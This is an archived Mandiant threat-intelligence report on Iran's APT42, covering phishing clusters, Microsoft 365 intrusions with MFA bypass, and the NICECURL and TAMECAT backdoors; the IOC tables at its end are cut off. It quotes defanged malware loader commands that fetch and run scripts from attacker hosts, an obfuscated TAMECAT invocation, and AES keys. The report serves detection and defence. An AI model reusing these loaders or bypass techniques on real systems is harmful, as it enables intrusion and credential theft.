{ "id": "456bfe5b-8435-428e-a1b3-d241873d1070", "created_at": "2026-04-06T00:16:27.176007Z", "updated_at": "2026-04-10T03:34:00.384327Z", "deleted_at": null, "sha1_hash": "e2b253b023aae7abc86c8ea77b5d6bc2b8b82d35", "title": "Uncharmed: Untangling Iran's APT42 Operations", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 4599988, "plain_text": "Uncharmed: Untangling Iran's APT42 Operations\r\nBy Mandiant\r\nPublished: 2024-05-01 · Archived: 2026-04-05 15:26:35 UTC\r\nWritten by: Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, Jonathan Leathery\r\nAPT42, an Iranian state-sponsored cyber espionage actor, is using enhanced social engineering schemes to gain\r\naccess to victim networks, including cloud environments. The actor is targeting Western and Middle Eastern\r\nNGOs, media organizations, academia, legal services and activists. Mandiant assesses APT42 operates on behalf\r\nof the Islamic Revolutionary Guard Corps Intelligence Organization (IRGC-IO).\r\nAPT42 was observed posing as journalists and event organizers to build trust with their victims through ongoing\r\ncorrespondence, and to deliver invitations to conferences or legitimate documents. These social engineering\r\nschemes enabled APT42 to harvest credentials and use them to gain initial access to cloud environments.\r\nSubsequently, the threat actor covertly exfiltrated data of strategic interest to Iran, while relying on built-in\r\nfeatures and open-source tools to avoid detection.\r\nIn addition to cloud operations, we also outline recent malware-based APT42 operations using two custom\r\nbackdoors: NICECURL and TAMECAT. These backdoors are delivered via spear phishing, providing the\r\nattackers with initial access that might be used as a command execution interface or as a jumping point to deploy\r\nadditional malware.\r\nAPT42 targeting and missions are consistent with its assessed affiliation with the IRGC-IO, which is a part of the\r\nIranian intelligence apparatus that is responsible for monitoring and preventing foreign threats to the Islamic\r\nRepublic and domestic unrest.\r\nAPT42 activities overlap with the publicly reported actors CALANQUE (Google Threat Analysis Group),\r\nCharming Kitten (ClearSky and CERTFA), Mint Sandstorm/Phosphorus (Microsoft), TA453 (Proofpoint), Yellow\r\nGaruda (PwC), and ITG18 (IBM X-Force).\r\nFigure 1: APT42 operations\r\nFake News, Real Credentials: Harvesting Microsoft, Yahoo, and Google\r\nCredentials\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 1 of 37\n\nAPT42 is known for its extensive credential harvesting operations that are often accompanied by tailored spear-phishing campaigns and extensive social engineering. APT42 credential harvesting operations typically include\r\nthree steps, described in the Figure 2.\r\nFigure 2: APT42 credential harvesting campaign attack lifecycle\r\nMandiant identified at least three clusters of infrastructure used by APT42 to harvest credentials from targets in\r\nthe policy and government sectors, media organizations and journalists, and NGOs and activists. The three\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 2 of 37\n\nclusters employ similar tactics, techniques and procedures (TTPs) to target victim credentials (spear-phishing\r\nemails), but use slightly varied domains, masquerading patterns, decoys, and themes.\r\nA full list of the infrastructure is available in the Indicators of Compromise (IOCs) section.\r\nCluster A: Posing as News Outlets and NGOs\r\nActive: 2021 – today\r\nSuspected Targeting: credentials of journalists, researchers, and geopolitical entities in regions of interest\r\nto Iran. \r\nMasquerading as: The Washington Post (U.S.), The Economist (UK), The Jerusalem Post (IL), Khaleej\r\nTimes (UAE), Azadliq (Azerbaijan), and more news outlets and NGOs. This often involves the use of\r\ntyposquatted domains like washinqtonpost[.]press.\r\nMandiant did not observe APT42 target or compromise these organizations, but rather impersonate them.\r\nAttack vector: Malicious links from typo-squatted domains that are masquerading as news articles likely\r\nsent via spear phishing, redirecting the user to fake Google login pages.\r\nFigure 3: Jerusalem Post journalist warns of spear-phishing emails sent on her behalf\r\nCluster B: Posing as Legitimate Services\r\nActive: 2019 – today\r\nTargeting: individuals perceived as a threat to the Iranian regime, including researchers, journalists, NGO\r\nleaders, and human rights activists.\r\nMasquerading as: generic login pages, file hosting services, and YouTube. The domains use TLDs like\r\n.top, .online, .site and .live, and often contain several words separated by hyphens, like panel-live-check[.]online.\r\nAttack vector: legitimate links sent via spear phishing, posing as invitations to conferences or legitimate\r\ndocuments hosted on cloud infrastructure. Upon entry, the user is prompted to enter their credentials, which\r\nare sent to the attackers.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 3 of 37\n\nMandiant observed several instances of APT42 using Cluster B domains to harvest credentials and host decoy\r\nfiles:\r\nIn March 2023, APT42 deployed the domain ksview[.]top in an attempt to redirect to honest-halcyon-fresher[.]buzz, which hosts a fake Gmail login page targeting a freelance journalist, indicating these\r\ncampaigns are highly tailored to their targets.\r\nFigure 4: Fake Gmail login page used by APT42\r\nIn March 2023, APT42 sent a spear-phishing email with a fake Google Meet invitation, allegedly sent on\r\nbehalf of Mona Louri, a likely fake persona leveraged by APT42, claiming to be a human rights activist\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 4 of 37\n\nand researcher. Upon entry, the user was presented with a fake Google Meet page and asked to enter their\r\ncredentials, which were subsequently sent to the attackers.\r\nFigure 5: Twitter account of Mona Louri, a likely fake persona leveraged by APT42\r\nThe fake page was hosted on Google Sites (sites[.]google[.]com) webpage creation tool to enhance its\r\nlegitimacy, and had a reference to a dedicated APT42 domain embedded in its HTML contents, as can be\r\nobserved in Figure 6 and Figure 7. This activity was also publicly mentioned on Twitter.\r\nFigure 6: Fake Google Meet page deployed by APT42\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 5 of 37\n\nFigure 7: APT42 domain embedded in the fake Google Meet page HTML contents\r\nFrom November through December 2023, APT42 targeted the media and non-profit sectors via spear-phishing emails that included the shortened link of the URL shortening service “n9[.]cl,” which redirected\r\nvictims to a likely credential harvesting page mimicking Google Drive using the domain\r\n“review[.]modification-check[.]online” while others included a link to the same domain without the\r\nshortener. The actor additionally shared a benign file via Google Drive as part of this campaign.\r\nIn February 2024, Mandiant observed the APT42 domain nterview[.]site redirecting to the domain admin-stable-right[.]top, which hosted a fake Gmail login page, to target the credentials of a women’s rights\r\nactivist. The domain nterview[.]site was also observed redirecting to a women’s rights-themed lure\r\nallegedly sent by “Jamileh Nedai” (possibly referring to the Iranian filmmaker and women’s rights\r\nactivist).\r\nThe lure, named “Questionnaire.pdf,” is a PDF document hosted on Dropbox with the headline\r\n“Women’s Struggles and Protest.” The document was created by “David Webb,” possibly referring\r\nto the Fox News contributor. We have no indication of this individual being targeted by APT42, but\r\nrather being spoofed by them, possibly to enhance the decoy's legitimacy.\r\nFigure 8: APT42 lure shared via Dropbox (left) containing women’s rights-related content (right)\r\nIn March 2024, APT42 used the domain shortlinkview[.]live, which redirects to panel-view[.]live, in a\r\ncampaign targeting a news editor working in a Persian-language news television channel. The final\r\nredirection hosts a fake Gmail login page.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 6 of 37\n\nDuring March 2024, APT42 also used the domain reconsider[.]site to redirect users to a decoy document\r\nhosted on Dropbox named “The Secrets of Gaza Tunnels” (titled both in Hebrew and in English), likely\r\nleveraging the Israel-Hamas war.\r\nFigure 9: Decoy document titled “The secrets of Gaza Tunnels” used by APT42\r\nAt the same time, APT42 also used the domain reconsider[.]site to redirect users to last-check-leave[.]buzz\r\nand target Google, Microsoft, and Yahoo credentials. This effort was focused on targeting researchers and\r\nacademia personnel in the U.S., Israel, and Europe.\r\nFigure 10: Fake Yahoo and Hotmail login page used by APT42\r\nIn addition, Mandiant also observed APT42 deploy fake YouTube login pages and URL shortener pages,\r\nlikely disseminated via phishing:\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 7 of 37\n\nFigure 11: Fake YouTube login page hosted on an APT42 domain\r\nFigure 12: Fake URL shortener page hosted on multiple APT42 domains\r\nCluster C: Posing as “Mailer Daemon,” URL Shortening Services and NGOs\r\nActive: 2022 – today\r\nTargeting: individuals and entities affiliated with various defense, foreign affairs, and academic issues in\r\nthe U.S. and Israel.\r\nSpecifically, in November 2023, Mandiant observed this cluster targeting a nuclear physics\r\nprofessor in a major Israeli university, by using the following phishing URL likely masquerading\r\nas a legitimate Microsoft 365 login:\r\nhxxps://email-daemon[.]online/\u003cuniversity_acronym\u003e365[.]onmicrosofl[.]com/accountID=\u003ctarget_handle\u003e\r\nMasquerading as: NGOs, “Mailer Daemon,” and Bitly URL shortening service.\r\nAttack vector: legitimate links likely sent via spear phishing, posing as invitations to conferences or\r\nlegitimate documents hosted on cloud infrastructure. Upon entry, the user is prompted to enter their\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 8 of 37\n\ncredentials, which are sent to the attackers.\r\nIn these cases, Mandiant observed APT42 encode targets or lures using “1337” (leet) writing. For example, the\r\nname of Tamir Pardo (the former head of the Israeli Mossad) was represented in the url\r\nhxxps://bitly[.]org[.]il/t4m1rpa by replacing \"a\" with 4 and \"i\" with 1.\r\nAPT42 likely attempted to use lures related to the International Counter-Intelligence summit (“ICT-2023”)\r\nconducted in Israel, by deploying the following URLs:\r\nhxxps://bitly[.]org[.]il/J03p4y3r\r\nhxxps://youtransfer[.]live/ICT-2023/J03py3r\r\nHead(er) In The Cloud: Targeting Microsoft 365 Environments\r\nAs an extension of their aforementioned credential harvesting operations, during 2022–2023, Mandiant observed\r\nAPT42 exfiltrate documents of interest to Iran and sensitive information from the victims’ public cloud\r\ninfrastructure. These victims were located in the U.S. and the UK in the legal services and NGO sectors. However,\r\nsince the initial enabler of these operations lies with credential harvesting, which APT42 conducts worldwide, it is\r\npossible the victimology is much wider.\r\nThese operations began with enhanced social engineering schemes to gain the initial access to victim\r\nnetworks, often involving ongoing trust-building correspondence with the victim. Only then the desired\r\ncredentials are acquired and multi-factor authentication (MFA) is bypassed, by serving a cloned website to capture\r\nthe MFA token (which failed) and later by sending MFA push notifications to the victim (which succeeded). \r\nThese techniques have allowed APT42 to covertly access and compromise the victim’s Microsoft 365\r\nenvironment, relying on built-in features and open-source tools to decrease their chances of being detected.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 9 of 37\n\nFigure 13: APT42 cloud operations attack lifecycle\r\nAPT42 cloud operations attack lifecycle can be described in details as follows:\r\nSocial engineering schemes involving decoys and trust building, which includes masquerading as\r\nlegitimate NGOs and conducting ongoing correspondence with the target, sometimes lasting several\r\nweeks. \r\nThe threat actor masqueraded as well-known international organizations in the legal and NGO fields\r\nand sent emails from domains typosquatting the original NGO domains, for example\r\naspenlnstitute[.]org.\r\nThe Aspen Institute became aware of this spoofed domain and collaborated with industry\r\npartners, including blocking it in SafeBrowsing, thus protecting users of Google Chrome and\r\nadditional browsers.\r\nTo increase their credibility, APT42 impersonated high-ranking personnel working at the\r\naforementioned organizations when creating the email personas.\r\nAPT42 enhanced their campaign credibility by using decoy material inviting targets to legitimate\r\nand relevant events and conferences. In one instance, the decoy material was hosted on an attacker-controlled SharePoint folder, accessible only after the victim entered their credentials. Mandiant did\r\nnot identify malicious elements in the files, suggesting they were used solely to gain the victim’s\r\ntrust.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 10 of 37\n\nFigure 14: APT42 controlled SharePoint folder containing PDF lures\r\nCredential harvesting and bypassing MFA. Only after a certain level of trust was built with the victim,\r\nAPT42 harvested the desired credentials by sending the victim a link that would redirect them to a\r\ncredential harvesting site, similar to the process described in the previously discussed credential theft\r\nsection. \r\nMandiant observed the use of Javascript files to redirect victims from these links to ultimately serve\r\nfake Microsoft 365 login pages.\r\nAt least once, Mandiant observed APT42 use several methods—both SharePoint login and fake\r\nLinkedIn login pages—to target multiple high-profile personnel of the victim organization during\r\nthe same campaign.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 11 of 37\n\nFigure 15: APT42 fake LinkedIn login page\r\nMandiant observed APT42 deploy two methods to bypass MFA: First, APT42 made attempts to\r\nacquire MFA tokens by using fake DUO pages, using subdomains with prefixes such as “api-\r\n\u003cgenerated_id\u003e[.]...” or using words like “duo”. When this failed, the actor sent authentication\r\nprompts to victims upon attempts to login, which succeeded. In a different intrusion, APT42 likely\r\nserved a phishing site to capture the MFA token sent via SMS and leveraged the KMSI (Keep-me-Signed-In) feature to avoid reauthentication.\r\nIn at least one instance, APT42 established a “persistent” login mechanism leveraging the\r\nMicrosoft app password feature, likely in attempts to preserve ongoing access for future logins\r\nwithout the need to re-verify their identity with MFA.\r\nMicrosoft’s app password feature is intended to be used with applications or devices that do\r\nnot support MFA, and thus generates single-use passwords that do not require MFA. The\r\nfeature is not enabled by default, and can be activated manually. Once this feature is enabled,\r\nany logged in user can create app passwords.\r\nAPT42 leveraged the fact that the app password feature was enabled to create an app\r\npassword for the compromised account. However, Mandiant has no indication that APT42\r\nactually used it.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 12 of 37\n\nFigure 16: Microsoft app password settings, exploited by APT42 for continuous MFA bypass\r\nCovert exfiltration of data from the Microsoft 365 environment, including OneDrive documents,\r\nOutlook emails, and documents of potential interest to Iran including files pertaining its foreign affairs or\r\nthe Persian Gulf region.The M365 infiltration and data exfiltration included the following stages:\r\nLogging in to the victim email using Thunderbird email client, whose usage was approved by the\r\nattacker altering the user permissions.\r\nLogging into the victim’s Citrix application and using Windows Remote Desktop Protocol (RDP).\r\nUpon entry, the attackers explored, enumerated, and staged files for exfiltration in password-protected 7-ZIP archives.\r\nThe attacker performed host, network, and directory reconnaissance using Windows native\r\ncommands including:\r\n\"whoami,\" \"net view,\" \"cd,\" \"explorer,\" \"net share,\" \"hostname,\" \"ls,\" \"type,\" \"ping,\" \"net\r\nuser,\" \"gci,\" \"mkdir,\" \"notepad,\" \"mv,\" \"exit,\" \"rm,\" \"dir,\" and \"del.\"\r\nThe attacker used PowerShell cmdlets including \"set-ExecutionPolicy,\" \"Import-Module,\"\r\nand \"Invoke-HuntSMBShares,\" a cmdlet from the open-source tooling module\r\nPowerHuntShares that can identify users with excessive network share permissions.\r\nSearching for specific files and data of interest to Iran. For example, in one of the intrusions,\r\nAPT42 searched for specific Iran-related documents with details about foreign affairs issues, as was\r\nobserved on collected data from the Windows Registry Key\r\nHKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths.\r\nIn another intrusion, Mandiant observed APT42 browsing for files related to the Middle East as well\r\nas the Ukraine war.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 13 of 37\n\nFigure 17: APT42 cloud operations flow of attack\r\nAPT42 deployed multiple defense evasion techniques to minimize their intrusion footprint:\r\nRelying on built-in features of the Microsoft 365 environment and publicly available tools. This serves\r\nas double functionality to harden attribution based on tooling and to blend in the environment, while it\r\nshows an increase in adaptability.\r\nClearing Google Chrome browser history after reviewing documents of interest.\r\nAttempting (and possibly succeeding) to exfiltrate files to a OneDrive account masquerading as the\r\nvictim’s organization, using the fake email address \u003cvictim_org_name\u003e@outlook[.]com. APT42 also\r\nbrowsed and downloaded files from the victim’s OneDrive to disk, likely to access files of interest. \r\nUsing anonymized infrastructure to interact with the victim’s environment, including ExpressVPN\r\nnodes, Cloudflare-hosted domains, and ephemeral VPS servers. \r\nDespite the previously listed defense evasion techniques, Mandiant was able to attribute the cloud operations to\r\nAPT42 based on the usage of domains overlapping with APT42 credential harvesting operations and the very\r\nspecific Iran-related nature of intelligence collected by the actor. \r\nAPT42 Malware-Based Operations\r\nMandiant tracks several APT42 campaigns using custom malware. Most recently, Mandiant observed APT42\r\ndeploy two custom backdoors, TAMECAT and NICECURL. Both of these backdoors were delivered with decoy\r\ncontent (likely via spear phishing) and provide APT42 operators with initial access to the targets. The backdoors\r\nprovide a flexible code-execution interface that may be used as a jumping point to deploy additional malware or to\r\nmanually execute commands on the device.\r\nMandiant estimates APT42 used these backdoors to target NGOs, government, or intergovernmental organizations\r\naround the world, handling issues related to Iran and the Middle East, consistent with APT42 targeting profile.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 14 of 37\n\nMalware\r\nFamily\r\nDescription\r\nNICECURL\r\nA backdoor written in VBScript that can download additional modules to be executed,\r\nincluding data mining and arbitrary command execution\r\nTAMECAT A PowerShell toehold that can execute arbitrary PowerShell or C# content\r\nTable 1: APT42 Malware Families\r\nNICECURL\r\nNICECURL is a backdoor written in VBScript that can download additional modules to be executed, including a\r\ndatamining module, and it provides an arbitrary command execution interface. The backdoor’s accepted\r\ncommands include \"kill\" to remove artifacts and end execution, \"SetNewConfig\" to set a new sleep value, and\r\n\"Module\" to download and execute additional files, potentially extending NICECURL's functionality. NICECURL\r\ncommunicates over HTTPS.\r\nIn January 2024, Mandiant observed a malicious LNK file downloading NICECURL and a PDF decoy that\r\nmasqueraded as an Interview Feedback Form of the Harvard T.H. Chan School of Public Health (Figure 18). The\r\ndecoy mentions an interviewee by the name of Daniel Serwer, possibly referring to the scholar and foreign policy\r\nresearcher by the same name, affiliated with the Middle East Institute. It is noteworthy that Mandiant has no\r\nindication these entities were targeted or compromised, but merely spoofed by APT42 decoys.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 15 of 37\n\nThe LNK file onedrive-form.pdf.lnk (MD5: d5a05212f5931d50bb024567a2873642) is downloaded from\r\nhxxps://drive-file-share[.]site/OneDrive-Form.pdf.lnk. This file was uploaded to the C2 on January 14, 2024.\r\nFigure 19: NICECURL LNK file hosted on drive-file-share[.]site\r\nThe LNK file contains the following command to download and execute the NICECURL from prism-west-candy[.]glitch[.]me (the original command is defanged):\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 16 of 37\n\ncmd.exe /c set c=cu7rl --s7sl-no-rev7oke -s -d \\\"id=CgYEFk\r\n\u0026Prog=2_Mal_vbs.txt\u0026WH=Form.pdf\\\" -X PO7ST hxxps://\r\nprism-west-candy[.]glitch[.]me/Down -o %temp%\\\\down.v7bs\r\n\u0026 call %c:7=% \u0026 set b=sta7rt \\\"\\\" \\\"%temp%\\\\down.v7bs\\\" \u0026 call %b:7=%\r\nIn February 2024, Mandiant identified another NICECURL sample named kuzen.vbs (MD5:\r\n347b273df245f5e1fcbef32f5b836f1d), which connects to worried-eastern-salto[.]glitch[.]me and downloads a\r\ndecoy file, question-Em.pdf (MD5: 2f6bf8586ed0a87ef3d156124de32757), about Empowering Women for Peace\r\nfrom an American think tank specializing in U.S. foreign policy and international relations (Figure 20).\r\nFigure 20: Decoy file question-Em.pdf (MD5: 2f6bf8586ed0a87ef3d156124de32757)\r\nAccording to the contents of the decoy file, the attack possibly happened in January or the beginning of February\r\n2024 and targeted a victim located in Australia.\r\nMandiant also observed a similarly named encrypted RAR file named “question_Empowering Women for Peace\r\nGender Equality in Conflict Prevention and Resolution (6).rar” (MD5: 13aa118181ac6a202f0a64c0c7a61ce7).\r\nThis RAR file shares the same name with the decoy PDF and likely targeted the same victim. \r\nThis infection chain was previously documented by Volexity.\r\nTAMECAT \r\nIn March 2024, Mandiant identified a sample of TAMECAT, a PowerShell toehold that can execute arbitrary\r\nPowerShell or C# content. TAMECAT is dropped by malicious macro documents, communicates with its\r\ncommand-and-control (C2) node via HTTP, and expects data from the C2 to be Base64 encoded. Mandiant\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 17 of 37\n\npreviously observed TAMECAT used in a large-scale APT42 spear-phishing campaign targeting individuals or\r\nentities employed by or affiliated with NGOs, government, or intergovernmental organizations around the world.\r\nTAMECAT Execution\r\nExecution begins with a small VBScript downloader that leverages Windows Management Instrumentation\r\n(WMI) to query anti-virus products running on the victim's system. Depending on the script determining if\r\nWindows Defender is running, differing download commands and URLs are used.\r\nIf Windows Defender is running, the script will leverage conhost to execute a PowerShell command that uses\r\nWget to download content at the following URL: hxxps://s3[.]tebi[.]io/icestorage/config/nconf.txt.\r\nFor all other cases, the script uses Cmd.exe to execute a Curl command that is similar to Curl commands used in\r\nthe NICECURL execution chain previously described:\r\ncmd.exe /c set c=cu9rl --s9sl-no-rev9oke -s -d \"\"i1=aaaa\u0026EF1=2m.txt\u0026WF1=test.pdf\"\" -X PO9ST\r\nhxxp://tnt200[.]mywire[.]org/Do1 -o %temp%\\2m.v9bs \u0026 call %c:9=% \u0026 set b=sta9rt \"\"\"\" \"\"%temp%\\2m.v9bs\"\"\r\n\u0026 call %b:9=%\r\na2.vbs (MD5: d7bf138d1aa2b70d6204a2f3c3bc72a7)\r\nDownloads: hxxps://s3[.]tebi[.]io/icestorage/config/nconf.txt (MD5:\r\n081419a484bbf99f278ce636d445b9d8)\r\nTAMECAT loader\r\nDownloads: hxxp://tnt200[.]mywire[.]org/Do1\r\nContent not available\r\nPossibly downloads malware from NICECURL ecosystem\r\nFigure 21: a2.vbs content\r\nThe downloaded script, nconf.txt (MD5: 081419a484bbf99f278ce636d445b9d8), is a PowerShell script that\r\ncontains an obfuscated and AES-encrypted TAMECAT backdoor. The script also downloads an additional\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 18 of 37\n\nPowerShell that is used to AES decrypt the embedded TAMECAT backdoor.\r\nWhen downloading the AES decryption script, the following hard-coded User-agent string is used:\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/119.0.0.0 Safari/537.36\r\nIt is noteworthy that the script contains a unique TAMECAT key value T2r0y1M1e1n1o0w1 that was used in a\r\npreviously reported TAMECAT sample observed in June 2023 (MD5: dd2653a2543fa44eaeeff3ca82fe3513),\r\nfurther indicating the two samples belong to the same malware family. However, the unique value is not used in\r\nthe script.\r\nThe script stores the URL for the AES decryption script as a Base64 string where the first three characters are\r\ntruncated and the remaining string is Base64 decoded: \r\npepaHR0cHM6Ly9zMy50ZWJpLmlvL2ljZXN0b3JhZ2UvZGYzMnMudHh0\r\nDecodes to: hxxps://s3[.]tebi[.]io/icestorage/df32s.txt\r\nThe script stored at this URL is df32s.txt (MD5: c3b9191f3a3c139ae886c0840709865e)\r\nThe response content is Base64 decoded and also further decoded using a routine that does the following:\r\nInverts the bits of each byte within an array named $bytesOfRes\r\nExtracts the least significant byte (8 bits) from the inverted representation\r\nConverts the extracted byte back into a numerical byte value\r\nOnce decoded, the resulting PowerShell function resembles the following:\r\nFigure 22: Decoded df32s.txt\r\nThe decoded script is a function that is mainly used to AES decrypt parameters that are passed to it. In addition, it\r\ndefines global variables including a C2 domain, which are used by the TAMECAT backdoor that gets decrypted\r\nand executed.\r\nThe following AES key and IV are used to decrypt content:\r\nAES Key: kNz0CXiP0wEQnhZXYbvraigXvRVYHk1B\r\nAES IV: 0T9r1y1M2e0N0o1w\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 19 of 37\n\nThe parent script uses the AES decrypt function to decode Base64, and AES decrypts the following string that is\r\ncontained in the parent script:\r\nv+UDXK47mBGgYqTbOXjXVD6MzhZenTfVf6CKxQFp2+AiPHMvmA2a4IiBz4rOi8ffxWdXFtrPk6\r\nUABw1b6oBPsW1VV/HNU0mf8jH7xsoBAHY5Sp6vdYc7WGZ6SYO72KIH/hOyBlS5wc7Y86wJ\r\nR9naW+0nINCYZV6RyD5t/fDpqEoRYW6dHwoebLECkEck/N5C1jhlFHaoS51QKSfgraHI5iRiT6p\r\nfpqUNeJHbYz3VYuo/j2FZ6f5BCJgXoHKPmf4pUSwSZH0qQSa98blmdAH+tG7jc3AUE76IHx4x\r\nkzxAldO/4b97duoI6rm+Ucy3rRHHrVnPQ0TvvTvudD/LDBwn3DkNcKSTDvEQDwIgni/MU7BOw\r\nklcE1+qQjabXTGr+CrL0c53dNA4OGNYkBAnLokjcoNxKmxbCSK3oSdFEz2+htgPMOjq14IGoPS\r\nOWcPX2CVK\r\nOnce decrypted, additional PowerShell is revealed that appends together a string obfuscated within nconf.txt, and\r\nAES decrypts the string. The decrypted results are the TAMECAT backdoor.\r\nBorjol($wvp[5]+$xme[2]+$nwk[3]+$vrl[3]+$gzk[4]+$ni2[0]+$tkk[2]+$kq4[0]+$yoe[4]+$jwv[0]+\r\n$ywa[0]+$sxi[5]+$bw9[12]+$kgu[1]+$mdi[0]+$ruz[3]+$byh[3]+$sja[3]+$wqf[0]+$wof[2]+$mg\r\n4[1]+$rfi[5]+$dt9[11]+$qgv[9]+$jt5[0]+$lli[1]+$owd[4]+$lp2[6]+$wkb[2]+$zen[7]+$sro[0]+$ta8\r\n[0]+$kg9[0]+$esk[8]+$ci4[5]+$oyx[0]+$ico[1]+$xy9[1]+$vvl[0])\r\nThe TAMECAT backdoor initially writes a likely victim identifier to the following location:\r\n%LOCALAPPDATA%\\config.txt.\r\nThe TAMECAT backdoor makes an initial POST request to the globally defined C2 domain: hxxps://accurate-sprout-porpoise[.]glitch[.]me. \r\nThe initial POST request contains information like the following, which are AES encrypted and Base64 encoded:\r\n{\r\n    \"rwsdjfxsdf\": [\r\n        {\r\n            \"num\": \"1\"\r\n        },\r\n        {\r\n            \"OS\": \"\u003cos_caption\u003e\"\r\n        },\r\n        {\r\n            \"ComputerName\": \"\u003ccomputer_name\u003e\"\r\n        },\r\n        {\r\n            \"Token\": \"\u003cvalue_from_configtxt\u003e\"\r\n        }\r\n    ]\r\n}\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 20 of 37\n\nThe TAMECAT backdoor AES encrypts the content using the key kNz0CXiP0wEQnhZXYbvraigXvRVYHk1B\r\nand a randomly generated 16-character IV, generated from the string\r\nABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz. The randomly generated IV is added to\r\nthe POST request in a header called Content-DPR. The AES key is not transmitted to the C2, so it is likely the\r\nsame AES key is used for multiple victims. \r\nIf the response is successful, it is also expected to contain a header named Content-DPR, which is expected to\r\nhouse an IV used with the aforementioned AES key to decrypt the response data.\r\nThe decrypted response data is split by the paragraph symbol (¶) into four values:\r\nLanguage\r\nCommand\r\nThreadName\r\nStartStop\r\nThe available commands appear mostly the same as previously identified TAMECAT samples:\r\nVariable Value Description\r\n$language powershell or csharp  Interpret command value as PowerShell or CSharp code\r\n$StartStop\r\ndownloadutils or start or\r\nstop\r\nDownload additional content, start command with parameters,\r\nstop command\r\nTable 2: Available commands\r\nOutlook and Implications\r\nAPT42 has remained relatively focused on intelligence collection and targeting similar victimology, despite the\r\nIsrael-Hamas war that has led other Iran-nexus actors to adapt by conducting disruptive, destructive, and hack-and-leak activities. \r\nIn addition to deploying custom implants on compromised devices, APT42 was also observed conducting\r\nextensive cloud operations. In cloud environments not vulnerable to implants, APT42 relies on social engineering\r\nto harvest credentials and collect intelligence of strategic interest to Iran. Credential abuse was also emphasized as\r\na common initial access vector to cloud environments in the latest Google Cloud Threat Horizons report.\r\nThe methods deployed by APT42 leave a minimal footprint and might make the detection and mitigation of their\r\nactivities more challenging for network defenders. The TTPs, IOCs, and provided rules included in this blog post\r\nmay support detection and mitigation efforts.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 21 of 37\n\nFor Google Chronicle Enterprise+ customers, Chronicle rules have been released to your Emerging Threats rule\r\npack, and IOCs listed in this blog post are available for prioritization with Applied Threat Intelligence. In addition,\r\nthe IOCs listed in this blog post are blocked in Safe Browsing, protecting Google Chrome users, as well as other\r\nbrowsers.\r\nIndicators of Compromise (IOCs)\r\nA VirusTotal Collection featuring IOCs related to the APT42 activity described in this post is now available for\r\nregistered users.\r\nCredential Harvesting and Cloud-Based Operations\r\nDomain Organization  Country \r\nCluster A\r\nNews Outlets\r\nazadlliq[.]info  Azadliq  Azerbaijan \r\nbusinesslnsider[.]org  Business Insider  U.S. \r\necomonist[.]org The Economist UK\r\neocnomist[.]com The Economist UK\r\nforeiqnaffairs[.]com  Foreign Affairs  U.S. \r\nforieqnaffairs[.]com Foreign Affairs  U.S. \r\nforeiqnaffairs[.]org Foreign Affairs  U.S. \r\nisraelhayum[.]com Israel Hayom Israel\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 22 of 37\n\njpost[.]press  Jerusalem Post  Israel \r\njpostpress[.]com  Jerusalem Post  Israel \r\nkhaleejtimes[.]org  Khaleej Times UAE \r\nkhalejtimes[.]org  Khaleej Times UAE \r\nmaariv[.]net  Maariv  Israel \r\nthemedealine[.]org  The Media Line  U.S. \r\ntimesfisrael[.]com Times Of Israel Israel\r\nvanityfaire[.]org Vanity Fair U.S.\r\nwashinqtonpost[.]press  The Washington Post  U.S. \r\nynetnews[.]press  Ynet  Israel \r\nLegitimate Services\r\naccount-signin[.]com Google/Microsoft N/A\r\nacconut-signin[.]com Google/Microsoft N/A\r\naccounts-mails[.]com Google/Microsoft N/A\r\ncoordinate[.]icu Generic N/A\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 23 of 37\n\ndloffice[.]top Microsoft N/A\r\ndloffice[.]buzz Microsoft N/A\r\nmyaccount-signin[.]com Google/Microsoft N/A\r\nsignin-acconut[.]com Google/Microsoft N/A\r\nsignin-accounts[.]com Google/Microsoft N/A\r\nsignin-mail[.]com Google/Microsoft N/A\r\nsignin-mails[.]com Google/Microsoft N/A\r\nsignin-myaccounts[.]com Google/Microsoft N/A\r\nsupport-account[.]xyz Google/Microsoft N/A\r\nCluster B\r\nGeneric Login Services\r\naccredit-validity[.]online Generic 